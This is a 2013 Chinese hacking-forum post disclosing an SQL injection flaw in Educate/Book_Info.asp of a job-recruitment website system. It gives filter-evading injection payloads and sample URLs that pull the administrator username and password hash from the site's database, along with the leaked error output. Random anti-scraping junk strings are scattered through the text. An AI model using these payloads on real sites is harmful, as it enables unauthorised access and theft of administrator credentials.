找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2356|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
% Y1 b, P& R' i$ v6 ^8 q
; J* F% x9 q: k" l此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! T5 n8 ~# G: g2 X! l  G' k8 M: v' V
; Q2 j" ~+ F' R, p7 m: ?exp:如下
" D5 t6 \  B2 X+ t查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. R) f" z4 ^2 I- v- L; |查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper); h7 `; ~3 B' n. U$ J# s5 l

5 S( F- j4 m% q' ?, Chttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# ]- @! t+ T8 @! C+ Q# v
) c) c% O8 U' v+ C) d+ a0 ~/ t" g( j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; n, |, {' z! K! I, z- n' I  n* H

6 U; t0 t' ~% a将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
) m0 m' e8 N) ?, z- D: y! n% c $ A& ^" e( Z, Y4 j1 A' R
/Educate/Book_Info.asp,行 8
: n/ M( K0 u( _! p+ r6 G/ C + A6 A9 u$ V# A3 T' B
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ U/ Y" V8 U6 E3 t/ o$ y$ k- B 7 U5 n5 f2 h' F( e  M. M& C
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
  L3 K, |. A* @- Y4 d6 `
( ~" L5 F# Y/ U+ x将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
. h8 N) w: M5 g& N( J
' ]  s6 z2 G5 V2 G/Educate/Book_Info.asp,行 8' G6 p1 t3 W9 w+ t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表